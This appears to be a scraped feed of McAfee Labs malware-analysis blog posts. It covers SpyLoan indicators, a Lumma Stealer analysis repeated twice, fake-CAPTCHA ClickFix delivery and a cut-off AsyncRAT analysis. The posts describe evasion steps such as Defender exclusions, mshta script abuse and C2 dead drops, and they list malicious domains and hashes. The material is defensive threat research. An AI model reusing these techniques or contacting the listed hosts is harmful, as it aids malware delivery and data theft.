com.credit.orange.enespeces.mtn.ouest.wave.argent.tresor.payer.pret	PrêtPourVous	100K	Senegal	453e23e68a9467f861d03cbace1f3d19909340dac8fabf4f70bc377f0155834e
com.huaynamoney.prestamos.creditos.peru.loan.credit	Huayna Money – Préstamo Rápido	100K	Peru	ef91f497e841861f1b52847370e2b77780f1ee78b9dab88c6d78359e13fb19dc
com.credito.iprestamos.dinero.en.linea.chile	IPréstamos: Rápido Crédito	100K	Chile	45697ddfa2b9f7ccfbd40e971636f9ef6eeb5d964e6802476e8b3561596aa6c2
com.conseguir.sol.pe	ConseguirSol-Dinero Rápido	100K	Peru	79fd1dccfa16c5f3a41fbdb0a08bb0180a2e9e5a2ae95ef588b3c39ee063ce48
com.pret.loan.ligne.personnel	ÉcoPrêt Prêt En Ligne	50K	Thailand	27743ab447cb3731d816afb7a4cecc73023efc4cd4a65b6faf3aadfd59f1768e

 

The post SpyLoan: A Global Threat Exploiting Social Engineering appeared first on McAfee Blog.

Lumma Stealer on the Rise: How Telegram Channels Are Fueling Malware Proliferation

Authored by: M.

Authored by: M, Mohanasundaram and Neil Tyagi

In today’s rapidly evolving cyber landscape, malware threats continue to adapt, employing new tactics and leveraging popular platforms to reach unsuspecting victims. One such emerging threat is the Lumma Stealer—a potent information-stealing malware recently gaining traction through Telegram channels. With Telegram’s popularity as a messaging and sharing platform, threat actors have identified it as a lucrative distribution vector, bypassing traditional detection mechanisms and reaching a broad, often unsuspecting audience.

Fortunately, McAfee’s advanced security solutions are equipped to detect and mitigate threats like Lumma Stealer. Through cutting-edge threat intelligence, behavioral analysis, and real-time monitoring, McAfee provides robust defenses against this malware, helping users secure their personal data and digital assets. In this blog, we will explore the tactics, techniques, and procedures (TTPs) used by Lumma Stealer, examine its capabilities, and discuss how McAfee solutions can help safeguard users from this rapidly spreading threat.

• Telegram channel offering malware disguised as crack software
• https[:]//t[.]me/hitbase
• Notice the high subscriber count of 42k.
• Last post on 3^rd Nov

• Another example of a telegram channel offering malware to benign users.
• https[:]//t[.]me/sharmamod
• Subscriber count 8.66k
• Last post on 3^rd Nov

 

• Also notice that both the channels are related as they are forwarding messages from each other’s telegram channel.
• McAfee detects these fake crack software as [Trojan:Win/Lummastealer.SD]
• Threat Prevalence observed as per McAfee telemetry data.
• India is most affected by this threat, followed by the USA and Europe.

• This blog will dissect one specific file, CCleaner 2024.rar. The others are similar in nature except for the theme.
• The hash for this file is 3df7a19969e54bd60944372e925ad2fb69503df7159127335f792ad82db7da0b.

• The extracted rar contains Microsoft DLL files

• Readme.txt contains the link to the telegram channel

• CCleaner 2024.exe is a .NET application

• We load the file into Dnspy and check the main function.

• In this, we have two calls to a function UninitializeBuilder, which decrypts the blob of data that is passed to it (AIOsncoiuuA & UserBuffer) along with the key (Alco and key).

• Decryption Key (Alco) and Encrypted data (AIOsncoiuuA) for the first call.

• Decryption Key (Key) and Encrypted data (UserBuffer) for the Second call.

• Snippet of the decryption Function.

• Decrypted data is saved into variable uiOAshyuxgYUA.
• We put a breakpoint on the end of this function and run the program to get the decrypted value of each call.
• For the first call, we get the following decrypted data in memory. We see process injection API calls were decrypted in memory.

• We can also see the target program in which the process injection will take place, in this case, RegAsm.exe.
• We can confirm this through the process tree.

• We let the breakpoint hit again to get the next layer decrypted PE file

• We can observe the decrypted PE bytes, dump this payload to disk, and inspect the next stage.
• Stage1 is a V C++ compiled file.

• We checked the payload sections and discovered that it holds encrypted data.

• Snippet of the decryption loop.

• Following decryption, the data is written to two files in the AppData Roaming folder.

• The first payload written in the AppData\Roaming folder is the .NET file “XTb9DOBjB3.exe”(Lumma_stealer) and the second payload also .Net file “bTkEBBlC4H.exe”(clipper).

• Upon examining both payloads, we observed that they employ the same decryption logic as the main file(ccleaner).

Lumma stealer:

• After dumping the payload from the .NET file, we discovered it is a 32-bit GUI Portable Executable.
• “winhttp.dll is dynamically loaded into the program using the LoadLibraryExW function.

• Upon inspecting the PE file, Base64-encoded strings were identified within the binary.

• The encoded data is first decoded from Base64 format, converting it back into binary. The decoded data is then passed through a decryption routine to recover the plaintext.

• We observe that the Plaintext resembles a domain, and it’s used to establish communication with a threat actor to exfiltrate the data.

• Code snippet for WinHttpOpenRequest:

List of Requests with post method:

• “hxxps://snarlypagowo.site/api”
• “hxxps://questionsmw.store/api”
• “hxxps://soldiefieop.site/api”
• “hxxps://abnomalrkmu.site/api”
• “hxxps://chorusarorp.site/api”
• “hxxps://treatynreit.site/api”
• “hxxps://mysterisop.site/api”
• “hxxps://absorptioniw.site/api”

At last, it connects to the steam community

• (hxxps://steamcommunity.com/profiles/76561199724331900),

The malware extracts the Steam account name, initially obfuscated to evade detection, and decodes it to reveal the C2 domain. This step is essential for establishing a connection between the compromised device and the attacker’s server, allowing further malicious activity such as data exfiltration and additional payload delivery. By using this technique, the attackers effectively bypass basic detection mechanisms, making it harder for traditional security solutions to identify the communication with the C2 server.

• This is the snippet of the Steam community:

• Upon checking the data, it was observed that the user’s name was obfuscated and had many aliases. We observed that the actual_persona_name fetched and it deobfuscated by the below code.

• Upon de-obfuscation, we found the plain text and its domain “marshal-zhukov.com”.

• Upon establishing a connection, the C2 server responded with configuration data in Base64 encoded format. The encoded data is first decoded from Base64 format, converting it back into binary. The decoded data is then passed through a decryption routine to recover the plaintext.

• Config for collecting wallet information.

• For Browser information:

• For FTP and email information:

• It also collects system information and sends it to c2.

• Clipper:
• Once we dumped the payload from the .NET file, we found that it was a 32-bit .NET executable named “Runtime64.exe.”

• We load the file into dnspy and check the main function.

• It begins by checking the mutex(“sodfksdkfalksdasgpkprgasdgrrkgwhrterheegwsdfwef”) to see if it’s already running on the machine.
• Autorun.is_installed: This function checks if the program is set to run on system startup. If autorun is not configured, it adds one to enable automatic execution on startup.

• This file sets the hidden attribute to false to remove the hidden status and set it as a system file to protect it.

• This Clipboard Monitor.run function Uses the following regex patterns to match the wallet addresses.

• If it matches, it replaces the clipboard content with the specified address to hijack the cryptocurrency.

• Code snippet for clipboard monitor and replacement:

Conclusion

The Lumma Stealer is a stark reminder of the ever-evolving nature of cyber threats and the rapid adaptability of malware tactics. Its spread through Telegram channels demonstrates how easily threat actors can exploit popular platforms to distribute malicious code to a broad audience. With Lumma Stealer capable of stealing sensitive information and compromising user privacy, the potential damage it can cause is significant.

In this increasingly dangerous cyber landscape, having robust, up-to-date protection has never been more crucial. McAfee’s advanced threat detection and proactive defense mechanisms provide users with a vital safeguard against such threats. By combining real-time monitoring, behavioral analysis, and continuous updates to counter new TTPs, McAfee helps users stay one step ahead of malicious actors. As TTPs evolve rapidly, maintaining comprehensive antivirus protection is essential to safeguarding personal data, financial information, and privacy. Staying vigilant and equipped with the proper security solutions ensures that users are prepared to face the latest threats head-on.

Indicators of Compromise

BLTools v4.5.5 New.rar	000756bedf4e95de6781a4193301123032e987aba33dcd55c5e2a9de20a77418
Blum Auto Bot Token.rar	06715881cd4694a0de28f8d2e3a8cc17939e83a4ca4dee2ebb3078fc25664180
Netflix Online Video 2024.rar	072aa67c14d047621e0065e8529fadd0aac1c1324e10e5d027c10073fffcd023
YouTube Downloader Version 2.1.6.rar	1724f486563c5715ce1fe989e8f4ca01890970816c5ffc2e5d0221e38cf9fdb9
Full Adobe Photoshop 2024 + CDkey.rar	174690d86d36c648a2d5a595bc8cfae70c157f00c750c36fd1a29f52011af5e2
Youtube Downloader Video 2024 Version.rar	18aca8b28750c9673f1c467f5eab1bbae4ad6c79f3fe598318c203c8e664d44f
ChatGPT-5 Version 2024 .rar	24a32d763e458e5440cb18f87685cc5626bf62cd9c3ca7bab10f0ced629708ee
Valorant Checker by Xinax 2024.rar	31a818c75d35bafc58c62c7522503f90be7b684803883e5f07c4cc16f517d1d0
Activation Windows 8,10,11 FULL + CDkey.rar	338ec6016db4eb95b15bc0822fc1d745f107ae0739a57b41ef10c9f64b6c8077
Ccleaner 2024.rar	3df7a19969e54bd60944372e925ad2fb69503df7159127335f792ad82db7da0b
CC Checker AcTeam 2024 New.rar	535650b613161c011086eab9d87189aa637f8575e52442db6e81602e67a2e4f4
Netflix mail access Checker 2024 New.rar	61a17a91ce2a98b455a50ff37b33368fe3b2f3a516cf94c5d7b18e386274557b
Paypal Checker New 2024 version.rar	840a255a184d3e819a07e3749b5e32da84f607ac7025366967d12dac0c5fa859
Free YouTube Downloader 2024.rar	9be6ea9ab019c7bd59fab7097ceb9cd465a6ae0c6b9a50d55432a0bfb5e1f184
Microsoft Office 2024 + CDkey.rar	a541b66785534bca646a7691c7a2a5630947ecbd4ee2544b19a5f8347f70f923
Crypto Seed Checker 2024 version.rar	ac5c6793354b2be799ce755828d72f65a0c2ea63ccc942208c22e893a251b52c
Phemex CryptoBot.rar	b53e0759fa11d6d31b837adf5c5ceda40dd01aa331aa42256282f9ca46531f25
SQLi Dumper v10.5.rar	ce8e7b2a6222aa8678f0c73bd29a9e3a358f464310002684d7c46b2b9e8dcf23
Cyber Ghost VPN + Key master.rar	d31520c4a77f01f0491ef5ecf03c487975182de7264d7dce0fb7988e0cea7248
AIO checker New Version 9.10.rar	d67cc175e2bb94e2006f2700c1b052123961f5f64a18a00c8787c4aa6071146f
Spotify Desktop Version 2024.rar	e71e23ad0e5e8b289f1959579fb185c34961a644d0e24a7466265bef07eab8ec
Nord VPN 2024 + Key.rar	fa34c20e1de65bfff3c0e60d25748927aa83d3ea9f4029e59aaedb4801220a54
Paysafecard Checker 2024 version.rar	fb60510e8595b773abde86f6f1792890978cd6efc924c187cb664d49ef05a250
TradingView 2024 New Version (Desktop).rar	fdc6ebf3968cd2dfcc8ad05202a847d7f8b2a70746800fd240e6c5136fcd34f6
Telegram channel	·      https[:]//t[.]me/hitbase
Telegram channel	·      https[:]//t[.]me/sharmamod
C2	marshal-zhukov.com

Mohanasundaram and Neil Tyagi

In today’s rapidly evolving cyber landscape, malware threats continue to adapt, employing new tactics and leveraging popular platforms to reach unsuspecting victims. One such emerging threat is the Lumma Stealer—a potent information-stealing malware recently gaining traction through Telegram channels. With Telegram’s popularity as a messaging and sharing platform, threat actors have identified it as a lucrative distribution vector, bypassing traditional detection mechanisms and reaching a broad, often unsuspecting audience.

Fortunately, McAfee’s advanced security solutions are equipped to detect and mitigate threats like Lumma Stealer. Through cutting-edge threat intelligence, behavioral analysis, and real-time monitoring, McAfee provides robust defenses against this malware, helping users secure their personal data and digital assets. In this blog, we will explore the tactics, techniques, and procedures (TTPs) used by Lumma Stealer, examine its capabilities, and discuss how McAfee solutions can help safeguard users from this rapidly spreading threat.

• Telegram channel offering malware disguised as crack software
• https[:]//t[.]me/hitbase
• Notice the high subscriber count of 42k.
• Last post on 3^rd Nov

• Another example of a telegram channel offering malware to benign users.
• https[:]//t[.]me/sharmamod
• Subscriber count 8.66k
• Last post on 3^rd Nov

 

• Also notice that both the channels are related as they are forwarding messages from each other’s telegram channel.
• McAfee detects these fake crack software as [Trojan:Win/Lummastealer.SD]
• Threat Prevalence observed as per McAfee telemetry data.
• India is most affected by this threat, followed by the USA and Europe.

• This blog will dissect one specific file, CCleaner 2024.rar. The others are similar in nature except for the theme.
• The hash for this file is 3df7a19969e54bd60944372e925ad2fb69503df7159127335f792ad82db7da0b.

• The extracted rar contains Microsoft DLL files

• Readme.txt contains the link to the telegram channel

• CCleaner 2024.exe is a .NET application

• We load the file into Dnspy and check the main function.

• In this, we have two calls to a function UninitializeBuilder, which decrypts the blob of data that is passed to it (AIOsncoiuuA & UserBuffer) along with the key (Alco and key).

• Decryption Key (Alco) and Encrypted data (AIOsncoiuuA) for the first call.

• Decryption Key (Key) and Encrypted data (UserBuffer) for the Second call.

• Snippet of the decryption Function.

• Decrypted data is saved into variable uiOAshyuxgYUA.
• We put a breakpoint on the end of this function and run the program to get the decrypted value of each call.
• For the first call, we get the following decrypted data in memory. We see process injection API calls were decrypted in memory.

• We can also see the target program in which the process injection will take place, in this case, RegAsm.exe.
• We can confirm this through the process tree.

• We let the breakpoint hit again to get the next layer decrypted PE file

• We can observe the decrypted PE bytes, dump this payload to disk, and inspect the next stage.
• Stage1 is a V C++ compiled file.

• We checked the payload sections and discovered that it holds encrypted data.

• Snippet of the decryption loop.

• Following decryption, the data is written to two files in the AppData Roaming folder.

• The first payload written in the AppData\Roaming folder is the .NET file “XTb9DOBjB3.exe”(Lumma_stealer) and the second payload also .Net file “bTkEBBlC4H.exe”(clipper).

• Upon examining both payloads, we observed that they employ the same decryption logic as the main file(ccleaner).

Lumma stealer:

• After dumping the payload from the .NET file, we discovered it is a 32-bit GUI Portable Executable.
• “winhttp.dll is dynamically loaded into the program using the LoadLibraryExW function.

• Upon inspecting the PE file, Base64-encoded strings were identified within the binary.

• The encoded data is first decoded from Base64 format, converting it back into binary. The decoded data is then passed through a decryption routine to recover the plaintext.

• We observe that the Plaintext resembles a domain, and it’s used to establish communication with a threat actor to exfiltrate the data.

• Code snippet for WinHttpOpenRequest:

List of Requests with post method:

• “hxxps://snarlypagowo.site/api”
• “hxxps://questionsmw.store/api”
• “hxxps://soldiefieop.site/api”
• “hxxps://abnomalrkmu.site/api”
• “hxxps://chorusarorp.site/api”
• “hxxps://treatynreit.site/api”
• “hxxps://mysterisop.site/api”
• “hxxps://absorptioniw.site/api”

At last, it connects to the steam community

• (hxxps://steamcommunity.com/profiles/76561199724331900),

The malware extracts the Steam account name, initially obfuscated to evade detection, and decodes it to reveal the C2 domain. This step is essential for establishing a connection between the compromised device and the attacker’s server, allowing further malicious activity such as data exfiltration and additional payload delivery. By using this technique, the attackers effectively bypass basic detection mechanisms, making it harder for traditional security solutions to identify the communication with the C2 server.

• This is the snippet of the Steam community:

• Upon checking the data, it was observed that the user’s name was obfuscated and had many aliases. We observed that the actual_persona_name fetched and it deobfuscated by the below code.

• Upon de-obfuscation, we found the plain text and its domain “marshal-zhukov.com”.

• Upon establishing a connection, the C2 server responded with configuration data in Base64 encoded format. The encoded data is first decoded from Base64 format, converting it back into binary. The decoded data is then passed through a decryption routine to recover the plaintext.

• Config for collecting wallet information.

• For Browser information:

• For FTP and email information:

• It also collects system information and sends it to c2.

• Clipper:
• Once we dumped the payload from the .NET file, we found that it was a 32-bit .NET executable named “Runtime64.exe.”

• We load the file into dnspy and check the main function.

• It begins by checking the mutex(“sodfksdkfalksdasgpkprgasdgrrkgwhrterheegwsdfwef”) to see if it’s already running on the machine.
• Autorun.is_installed: This function checks if the program is set to run on system startup. If autorun is not configured, it adds one to enable automatic execution on startup.

• This file sets the hidden attribute to false to remove the hidden status and set it as a system file to protect it.

• This Clipboard Monitor.run function Uses the following regex patterns to match the wallet addresses.

• If it matches, it replaces the clipboard content with the specified address to hijack the cryptocurrency.

• Code snippet for clipboard monitor and replacement:

Conclusion

The Lumma Stealer is a stark reminder of the ever-evolving nature of cyber threats and the rapid adaptability of malware tactics. Its spread through Telegram channels demonstrates how easily threat actors can exploit popular platforms to distribute malicious code to a broad audience. With Lumma Stealer capable of stealing sensitive information and compromising user privacy, the potential damage it can cause is significant.

In this increasingly dangerous cyber landscape, having robust, up-to-date protection has never been more crucial. McAfee’s advanced threat detection and proactive defense mechanisms provide users with a vital safeguard against such threats. By combining real-time monitoring, behavioral analysis, and continuous updates to counter new TTPs, McAfee helps users stay one step ahead of malicious actors. As TTPs evolve rapidly, maintaining comprehensive antivirus protection is essential to safeguarding personal data, financial information, and privacy. Staying vigilant and equipped with the proper security solutions ensures that users are prepared to face the latest threats head-on.

Indicators of Compromise

BLTools v4.5.5 New.rar	000756bedf4e95de6781a4193301123032e987aba33dcd55c5e2a9de20a77418
Blum Auto Bot Token.rar	06715881cd4694a0de28f8d2e3a8cc17939e83a4ca4dee2ebb3078fc25664180
Netflix Online Video 2024.rar	072aa67c14d047621e0065e8529fadd0aac1c1324e10e5d027c10073fffcd023
YouTube Downloader Version 2.1.6.rar	1724f486563c5715ce1fe989e8f4ca01890970816c5ffc2e5d0221e38cf9fdb9
Full Adobe Photoshop 2024 + CDkey.rar	174690d86d36c648a2d5a595bc8cfae70c157f00c750c36fd1a29f52011af5e2
Youtube Downloader Video 2024 Version.rar	18aca8b28750c9673f1c467f5eab1bbae4ad6c79f3fe598318c203c8e664d44f
ChatGPT-5 Version 2024 .rar	24a32d763e458e5440cb18f87685cc5626bf62cd9c3ca7bab10f0ced629708ee
Valorant Checker by Xinax 2024.rar	31a818c75d35bafc58c62c7522503f90be7b684803883e5f07c4cc16f517d1d0
Activation Windows 8,10,11 FULL + CDkey.rar	338ec6016db4eb95b15bc0822fc1d745f107ae0739a57b41ef10c9f64b6c8077
Ccleaner 2024.rar	3df7a19969e54bd60944372e925ad2fb69503df7159127335f792ad82db7da0b
CC Checker AcTeam 2024 New.rar	535650b613161c011086eab9d87189aa637f8575e52442db6e81602e67a2e4f4
Netflix mail access Checker 2024 New.rar	61a17a91ce2a98b455a50ff37b33368fe3b2f3a516cf94c5d7b18e386274557b
Paypal Checker New 2024 version.rar	840a255a184d3e819a07e3749b5e32da84f607ac7025366967d12dac0c5fa859
Free YouTube Downloader 2024.rar	9be6ea9ab019c7bd59fab7097ceb9cd465a6ae0c6b9a50d55432a0bfb5e1f184
Microsoft Office 2024 + CDkey.rar	a541b66785534bca646a7691c7a2a5630947ecbd4ee2544b19a5f8347f70f923
Crypto Seed Checker 2024 version.rar	ac5c6793354b2be799ce755828d72f65a0c2ea63ccc942208c22e893a251b52c
Phemex CryptoBot.rar	b53e0759fa11d6d31b837adf5c5ceda40dd01aa331aa42256282f9ca46531f25
SQLi Dumper v10.5.rar	ce8e7b2a6222aa8678f0c73bd29a9e3a358f464310002684d7c46b2b9e8dcf23
Cyber Ghost VPN + Key master.rar	d31520c4a77f01f0491ef5ecf03c487975182de7264d7dce0fb7988e0cea7248
AIO checker New Version 9.10.rar	d67cc175e2bb94e2006f2700c1b052123961f5f64a18a00c8787c4aa6071146f
Spotify Desktop Version 2024.rar	e71e23ad0e5e8b289f1959579fb185c34961a644d0e24a7466265bef07eab8ec
Nord VPN 2024 + Key.rar	fa34c20e1de65bfff3c0e60d25748927aa83d3ea9f4029e59aaedb4801220a54
Paysafecard Checker 2024 version.rar	fb60510e8595b773abde86f6f1792890978cd6efc924c187cb664d49ef05a250
TradingView 2024 New Version (Desktop).rar	fdc6ebf3968cd2dfcc8ad05202a847d7f8b2a70746800fd240e6c5136fcd34f6
Telegram channel	·      https[:]//t[.]me/hitbase
Telegram channel	·      https[:]//t[.]me/sharmamod
C2	marshal-zhukov.com

The post Lumma Stealer on the Rise: How Telegram Channels Are Fueling Malware Proliferation appeared first on McAfee Blog.

Behind the CAPTCHA: A Clever Gateway of Malware

Authored by Yashvi Shah and Aayush Tyagi

Executive summary

McAfee Labs recently observed an infection chain where fake CAPTCHA pages are being leveraged to distribute malware, specifically Lumma Stealer. We are observing a campaign targeting multiple countries. Below is a map showing the geolocation of devices accessing fake CAPTCHA URLs, highlighting the global distribution of the attack.

Figure 1: Prevalence on the field

We identified two infection vectors leading users to these fake CAPTCHA pages: one via cracked game download URLs, and the other through phishing emails. GitHub users have been targeted by phishing emails prompting them to address a fictitious “security vulnerability” in a project repository to which they have contributed or subscribed. These emails direct users to visit “github-scanner[.]com” for further information about the alleged security issue.

The ClickFix infection chain operates by deceiving users into clicking on buttons like “Verify you are a human” or “I am not a robot.” Once clicked, a malicious script is copied to the user’s clipboard. Users are then misled into pasting the script after pressing the Windows key + R, unknowingly executing the malware. This method of trickery facilitates the infection process, making it easy for attackers to deploy malware.

Figure 2: Infection chain

Attack Vectors and Technical Analysis

As illustrated in the diagram, users are redirected to fake CAPTCHA pages through two main attack vectors:

1.     Cracked Gaming Software Download URLs:

Users attempting to download pirated or cracked versions of gaming software are redirected to malicious CAPTCHA pages.

Figure 3: Search to download the cracked version of the game

When users search the Internet for free or cracked versions of popular video games, they may encounter online forums, community posts, or public repositories that redirect them to malicious links.

Figure 4: Runkit directing the user to download the game

In this instance, a public Runkit notebook hosts the malicious link (highlighted in blue). When the user accesses the URL (highlighted in red), they are redirected to fake CAPTCHA websites.

Figure 5: Redirection happening while accessing the link

On this page, after the user clicks the “I’m not a robot” button, a malicious PowerShell script is copied to their clipboard, and they are prompted to execute it.

Figure 6: Backend script on the click button

The website includes JavaScript functionality that copies the script to the clipboard.

Figure 7: Decoded script

The script is Base64-encoded (highlighted in blue), to reduce the readability to the user. Upon decoding it (highlighted in red), mshta was found to be leveraged. The file hosted at https://verif.dlvideosfre[.]click/2ndhsoru contains a Windows binary, having scripts appended as the overlay. Without the overlay appended, the file is a clean Windows binary.

Figure 8: Windows binary with appended script

The mshta utility searches for the <script> tag within a file and executes the script embedded in it, completely ignoring the binary portion of the file. This allows attackers to embed malicious scripts alongside non-executable content, making it easier for the malware to go undetected while still being executed through mshta.

Figure 9: Obfuscated script appended in the downloaded file

Upon analysis, the script was found to be an encrypted JavaScript file, utilizing two layers of encryption. This multi-level encryption obscures the script’s true functionality, making detection and analysis more challenging for security tools. Further analysis revealed that the decrypted JavaScript was designed to download Lumma Stealer using AES-encrypted PowerShell command and drop it in the Temp folder. This technique helps the malware avoid detection by placing the payload in a commonly used, less scrutinized directory, facilitating the next stage of the infection.

Figure 10: Process tree

2.     Phishing Emails impersonating the GitHub team

In the second vector, users receive phishing emails, often targeting GitHub contributors, urging them to address a fake “security vulnerability.” These emails contain links leading to the same fake CAPTCHA pages.

Figure 11: Phishing email impersonating GitHub

Once the user clicks on the link, they’re redirected to the fake captcha pages.

Figure 12: Fake CAPTCHA page

These pages use the same technique: the malicious script is copied to the clipboard when the user clicks the button, and they are then prompted to execute it.

Figure 13: Script copied onto clipboard

This script retrieves and executes the contents of a text file hosted on an online server.

Figure 14: Invoking the remote script

The content of the text file contains PowerShell commands that download an executable file or a zip file. These files are saved into the temp folder and then executed. The downloaded files, in these cases, are Lumma Stealer samples.

Detection and Mitigation Strategies

McAfee blocks this infection chain at multiple stages:

1. URL blocking of the fake CAPTCHA pages.

Figure 15: McAfee blocking URLs

2. Heuristic blocking of malicious use of mshta.

Figure 16: McAfee blocking the malicious behavior

Conclusion and Recommendations

In conclusion, the ClickFix infection chain demonstrates how cybercriminals exploit common user behaviors—such as downloading cracked software and responding to phishing emails—to distribute malware like Lumma Stealer. By leveraging fake CAPTCHA pages, attackers deceive users into executing malicious scripts that bypass detection, ultimately leading to malware installation.

The infection chain operates through two main vectors: cracked gaming software download URLs and phishing emails impersonating GitHub. In both cases, users are redirected to malicious CAPTCHA pages where scripts are executed to download and install malware. The use of multi-layered encryption further complicates detection and analysis, making these attacks more sophisticated and harder to prevent.

At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the Clickfix social engineering technique. Here are our recommended mitigations and remediations:

1. Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
2. Install and maintain updated antivirus and anti-malware software on all endpoints.
3. Implement robust email filtering to block phishing emails and malicious attachments.
4. Use network segmentation to limit the spread of malware within the organization.
5. Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
6. Avoid downloading cracked software or visiting suspicious websites.
7. Verify URLs in emails, especially from unknown or unexpected sources.
8. Restrict clipboard-based scripts and disable automatic script execution.
9. Keep antivirus solutions updated and actively scan.
10. Educate users to avoid suspicious CAPTCHA prompts on untrusted sites.
11. Regularly patch browsers, operating systems, and applications.
12. Monitor the Temp folder for unusual or suspicious files.

Indicators of Compromise (IoCs)

File Type	SHA256/URLs
	Fake Captcha Websites
URL	Ofsetvideofre[.]click/
URL	Newvideozones[.]click/veri[.]html
URL	Clickthistogo[.]com/go/67fe87ca-a2d4-48ae-9352-c5453156df67?var_3=F60A0050-6F56-11EF-AA98-FFC33B7D3D59
URL	Downloadstep[.]com/go/08a742f2-0a36-4a00-a979-885700e3028c
URL	Betterdirectit[.]com/
URL URL	Betterdirectit[.]com/go/67fe87ca-a2d4-48ae-9352-c5453156df67 heroic-genie-2b372e[.]netlify[.]app/please-verify-z[.]html
URL	Downloadstep[.]com/go/79553157-f8b8-440b-ae81-0d81d8fa17c4
URL	Downloadsbeta[.]com/go/08a742f2-0a36-4a00-a979-885700e3028c
URL	Streamingsplays[.]com/go/6754805d-41c5-46b7-929f-6655b02fce2c
URL	Streamingsplays[.]com/go/b11f973d-01d4-4a5b-8af3-139daaa5443f
URL	Streamingszone[.]com/go/b3ddd860-89c0-448c-937d-acf02f7a766f?c=AOsl62afSQUAEX4CAEJPFwASAAAAAABQ
URL	Streamingsplays[.]com/go/1c406539-b787-4493-a61b-f4ea31ffbd56
URL	github-scanner[.]shop/
URL	github-scanner[.]com/
URL	botcheck.b-cdn[.]net/captcha-verify-v7.html

 

	Redirecting Websites
URL	Rungamepc[.]ru/?load=Black-Myth-Wukong-crack
URL	game02-com[.]ru/?load=Cities-Skylines-2-Crack-Setup
URL	Rungamepc[.]ru/?load=Dragons-Dogma-2-Crack
URL	Rungamepc[.]ru/?load=Dying-Light-2-Crack
URL	Rungamepc[.]ru/?load=Monster-Hunter-Rise-Crack

 

	Websites Containing Malicious URLs
URL	Runkit[.]com/wukong/black-myth-wukong-crack-pc
URL	Runkit[.]com/skylinespc/cities-skylines-ii-crack-pc-full-setup
URL	Runkit[.]com/masterposte/dying-light-2-crack-on-pc-denuvo-fix
URL	Runkit[.]com/dz4583276/monster-hunter-rise-crack-codex-pc/1.0.0/clone
URL	Groups[.]google[.]com/g/hogwarts-legacy-crack-empress
URL	By[.]tribuna[.]com/extreme/blogs/3143511-black-myth-wukong-full-unlock/

 

	Malware Samples
PS	b6a016ef240d94f86e20339c0093a8fa377767094276730acd96d878e0e1d624
PS	cc29f33c1450e19b9632ec768ad4c8c6adbf35adaa3e1de5e19b2213d5cc9a54
ZIP	632816db4e3642c8f0950250180dfffe3d37dca7219492f9557faf0ed78ced7c
ZIP	19d04a09e2b691f4fb3c2111d308dcfa2651328dfddef701d86c726dce4a334a
EXE	d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207
EXE	bbf7154f14d736f0c8491fb9fb44d2f179cdb02d34ab54c04466fa0702ea7d55
HTA	fa58022d69ca123cbc1bef13467d6853b2d55b12563afdbb81fc64b0d8a1d511

 

The post Behind the CAPTCHA: A Clever Gateway of Malware appeared first on McAfee Blog.

Cracked Software or Cyber Trap? The Rising Danger of AsyncRAT Malware

Authored by Neil Tyagi

In cybersecurity, threats constantly evolve, and new ways to exploit unsuspecting users are being found. One of the latest menaces is a recent AsyncRAT variant, a sophisticated remote access trojan (RAT) that’s been making waves by marketing itself as cracked software. This tactic plays on the desire for free access to premium software, luring users into downloading what appears to be a harmless application. However, beneath the surface lies dangerous malware designed to infiltrate systems, steal sensitive information, and give cybercriminals complete control over infected devices.

In this blog, we’ll examine the mechanics of AsyncRAT, how it spreads by masquerading as cracked software, and the steps you can take to protect yourself from this increasingly common cyber threat.

McAfee telemetry data shows this threat has been in the wild since March 2024 and is prevalent with infected hosts worldwide.

• • We have many initial vectors for this chain, masquerading as different software

• • Theme: CCleaner. Hash: 6f976e1b53271178c2371bec7f64bd9cf2a2f936dc9670c40227c9d7ea56b8e6

• • Theme: Sidify Music Converter. Hash: 9aaabe9807f9ba1ad83bbb33b94648d32054f9dc575a5b77f92876d018eed91c

• • Theme: Ease US Partition Master. Hash: 84521572d3baeb218996daa3ab13be288b197095a677940146bf7a0285b71306

• • Theme: YouTube Downloader Hash: 00a1afd74d1a40593539a4e9115ab4c390cad9024d89931bd40d4279c95e9b6a

• • Asyncrat is coming in the theme of AnyDesk software. HASH: 2f1703c890439d5d6850ea1727b94d15346e53520048b694f510ed179c881f72
  • In this blog, we will analyze the AnyDesk-themed malware; the other noted themes are similar in nature.
  • Also, note that the setup.dll file shown in the above pictures is the same as it has the same hash.

• • Anydesk 8.0.6 Portable.exe is a 64-bit .NET file. However, it is not the original Anydesk file; it is malware.

• • Carried within the malware is an Anydesk.data file, the genuine anydesk application.

• • We can confirm that the Anydesk. data file has a valid digital signature from the publishers of Anydesk software.

• • When we rename the anydesk.data file to anydesk.exe, we can also see the anydesk software running.

• • Setup.dll is a bat file, as we can see in the above image
  • We start debugging by putting the malicious AnyDesk executable into the Dnspy tool to review the source code.
    

• • The primary function calls the IsAdmin function, which checks the current context of the running process. Based on this, it calls four functions in succession: AddExclusion, CopyAndRenameFile, RunScript, and ExecuteScript. We will check each function call separately.
    

• • The AddExlusion function passes the above string into the RunHiddenCommand Function.
    

• • Runhidden command will take that string, launch an instance of PowerShell, and execute that string as an argument.
  • This will effectively add a Windows Defender scan exclusion for the entire C drive.
    

• The CopyAndRenameFile Function will rename the setup.dll file to the setup.bat file and copy it to the appdata\local\temp folder.

• • After the bat file is copied to the temp folder, it will be executed using a process start call.
    

• • Now, to convince the user that he has indeed opened the AnyDesk software, the AnyDesk.data file containing the original AnyDesk software will be renamed AnyDesk.exe.
  • This is the whole purpose of the malware AnyDesk.exe file. Now, the attack chains move to execute the bat script, which we will analyze further.
    

• The bat file uses dos obfuscation
• It is setting environment variables to be used later during execution.
• Also, lines 6 and 7 have two long comments and an encrypted payload.
• In line 13, it echoes something and pipes it to the %Ahmpty% environment variable.

• • We can easily deobfuscate the strings by launching an instance of cmd, executing the set commands, and echoing the contents of the variables.
  • One thing to note here is that %variablename% will echo the entire contents of the variable, but %varibalename:string=% will replace any occurrence of “string” in the contents of “variable name” with a null character.
    

• • The above image is after deobfuscation of all strings and formatting of the script in a human-readable form.
  • Script first sets @echo as off
  • Then, it checks if the environment variable Ajlp is set. If not, it sets Ajlp to 1 and again starts the execution of the bat script (%0 contains the path to the same script) in minimized form, exiting the original script.
  • Then we have our two comments, which later turn out to be encrypted payloads
  • Then the script checks which version of PowerShell is present on the system because, for older versions of Windows, PowerShell is sometimes located in the syswow64 folder. For successful exploitation of those versions of Windows, this check is done
